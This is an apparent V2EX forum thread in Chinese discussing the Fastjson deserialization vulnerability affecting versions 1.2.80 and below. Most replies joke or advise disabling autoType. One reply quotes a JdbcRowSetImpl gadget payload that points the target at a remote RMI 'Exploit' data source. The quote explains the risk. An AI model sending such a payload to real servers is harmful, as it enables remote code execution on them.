V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
twofox
V2EX  ›  Java

Fastjson 反序列化漏洞 影响版本≤1.2.80

  •  1
     
  •   twofox · 2022-05-24 21:06:19 +08:00 · 4757 次点击
    这是一个创建于 900 天前的主题,其中的信息可能已经有所发展或是发生改变。

    近日 Fastjson Develop Team 发现 fastjson 1.2.80 及以下存在新的风险,请关注。 fastjson 已使用黑白名单用于防御反序列化漏洞,经研究该利用在特定条件下可绕过默认 autoType 关闭限制,攻击远程服务器,风险影响较大。建议 fastjson 用户尽快采取安全措施保障系统安全。

    这个影响是不是有点大。我司目前还在用 1.2.34 ( CSDN 都有复现教程了

    但是我同时有点好奇,这些漏洞怎么样去利用的?有什么论坛是交流这些的吗

    我是 web 开发,并非网络安全方向,所以不太懂

    22 条回复    2022-05-26 05:04:38 +08:00
    ychost
        1
    ychost  
       2022-05-24 21:27:15 +08:00   ❤️ 1
    fastJSON 几乎所有的漏洞都和 autoType 有关,这玩意儿大部分都用不到,关了之后就没啥问题,它主要解决的是反序列化的类不确定,比如 {"@type":"com.abc.biz.Label","name":"","value":""},那么反序列化的时候就会去用 classLoader 加载 com.abc.biz.Label 这个类,如果这个类被故意攻击,用到了 jdbc 里面的类,然后就比较危险了,比如 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
    就能加载远程 dataSource 了,个人建议能关 autoType 就关掉,想用的话开白名单模式
    golangLover
        2
    golangLover  
       2022-05-24 21:30:14 +08:00 via Android
    没发现漏洞才是新闻吧。


    还跟多国内文章推荐这个,害人不浅
    pengtdyd
        3
    pengtdyd  
       2022-05-24 21:37:22 +08:00
    不知道是第 N 次听到出漏洞的消息了
    sagaxu
        4
    sagaxu  
       2022-05-24 21:41:27 +08:00   ❤️ 1
    这货有哪一年不出这类漏洞?
    yangyaofei
        5
    yangyaofei  
       2022-05-24 23:13:11 +08:00
    @ychost 这个 type 貌似很多序列化库都有, 比如 jackson, 虽然但是, 我用 jackson...
    Greatshu
        6
    Greatshu  
       2022-05-25 02:43:27 +08:00
    现在还在用 fastjson 的一定是个加班爱好者
    DreamSaddle
        7
    DreamSaddle  
       2022-05-25 07:57:10 +08:00
    白学家:不会吧,不会吧,还有人敢用这玩意?
    chendy
        8
    chendy  
       2022-05-25 08:20:59 +08:00
    人生苦短,我选择 spring boot 默认的 hikari 和 fastjson ,能少配一点是一点
    不过是代码就有漏洞,及时更新其实都没事
    oneisall8955
        9
    oneisall8955  
       2022-05-25 08:39:32 +08:00 via Android
    @chendy springboot 默认 jackson 吧?
    chendy
        10
    chendy  
       2022-05-25 08:59:20 +08:00
    @chendy @oneisall8955 上班摸鱼手滑了……
    Saxton
        11
    Saxton  
       2022-05-25 09:03:20 +08:00
    @Greatshu 996 福报警告
    potatowish
        12
    potatowish  
       2022-05-25 09:21:34 +08:00 via iPhone
    默认自带的 jackson 它不香吗,为什么还要单独引入 fastjson
    0xfan
        13
    0xfan  
       2022-05-25 09:26:37 +08:00
    累了,就这样吧,有漏洞就有吧,躺平了 [/狗头]
    f64by
        14
    f64by  
       2022-05-25 09:27:44 +08:00   ❤️ 1
    以前在 README 里写 gson 是龟 son 缩写的,就是 fastjson 干的吧
    xuanbg
        15
    xuanbg  
       2022-05-25 09:29:08 +08:00
    反序列化的时候不能确定目标类型的话,肯定是设计问题,只要完善设计,就可以规避这种问题了。所以,fastjson 这个 autoType 功能真的就是画蛇添足。
    zmal
        16
    zmal  
       2022-05-25 15:25:11 +08:00
    @xuanbg 怎么规避?请指教。
    AllenHua
        17
    AllenHua  
       2022-05-25 15:46:31 +08:00
    Fastjson 到底做错了什么?为什么会被频繁爆出漏洞? https://www.163.com/dy/article/FGV541KF05319WXB.html

    [高危安全通告] fastjson≤1.2.80 反序列化漏洞 https://juejin.cn/post/7101506799387279396
    AllenHua
        18
    AllenHua  
       2022-05-25 15:47:33 +08:00
    不过实际项目中,我挺喜欢用 fastjson 的啊(我是异类,狗头
    hhjswf
        19
    hhjswf  
       2022-05-25 16:18:06 +08:00
    5. 怎么判断是否用到了 autoType
    看序列化的代码中是否用到了 SerializerFeature.WriteClassName

    这东西基本没用到吧?管它呢,不升级。。
    dbpe
        20
    dbpe  
       2022-05-25 17:36:02 +08:00
    唉..很多漏洞都是默认开启一些 xxx...实际上我们根本用不到....
    shuang
        21
    shuang  
       2022-05-26 00:18:03 +08:00
    @hhjswf 虽然心里有点慌,我也是选择先不升级吧,怕升级后再出现什么不兼容的问题影响就大了
    xuanbg
        22
    xuanbg  
       2022-05-26 05:04:38 +08:00
    @zmal 不要过度抽象。什么时候连泛型都解决不了问题,那肯定就是过度抽象了。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2847 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 28ms · UTC 12:24 · PVG 20:24 · LAX 04:24 · JFK 07:24
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.